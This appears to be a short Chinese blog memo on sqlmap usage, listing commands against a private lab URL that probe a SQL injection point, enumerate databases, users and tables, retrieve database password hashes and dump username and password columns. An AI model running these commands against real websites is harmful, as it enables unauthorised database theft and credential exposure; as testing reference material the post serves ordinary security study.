zoukankan      html  css  js  c++  java
  • sqlmap的简要使用方法

    仅作为备忘!!!

    sqlmap使用:

    注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' #-u 注入点   检测注入点是否可用
    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --dbs    #可曝出该sqlserver中所有数据库名称
    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-db   #web当前使用的数据库
    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-user  #web数据库使用账户
    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --users    #列出sql所有用户
    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --passwords   #数据库账户与密码
    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --tables    #输出所有的表
    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 --tables  #-D 指定数据库名

    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 --columns  #-T:指定要列出字段的表   --columns 列出了所有的列字段

    sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 -C "username,realname,password" --dump     # -C :指定要暴的字段  --dump:将结果导出

  • 相关阅读:
    笔记1
    笔记2
    笔记3
    两个多线程的交替打印
    三个多线程的交替打印
    内部类
    基本反射了解
    键盘监听事件KeyListener
    焦点监听事件FocusListener
    文本框JTextField,密码框JPasswordField
  • 原文地址:https://www.cnblogs.com/zhuandshao/p/7137951.html
Copyright © 2011-2022 走看看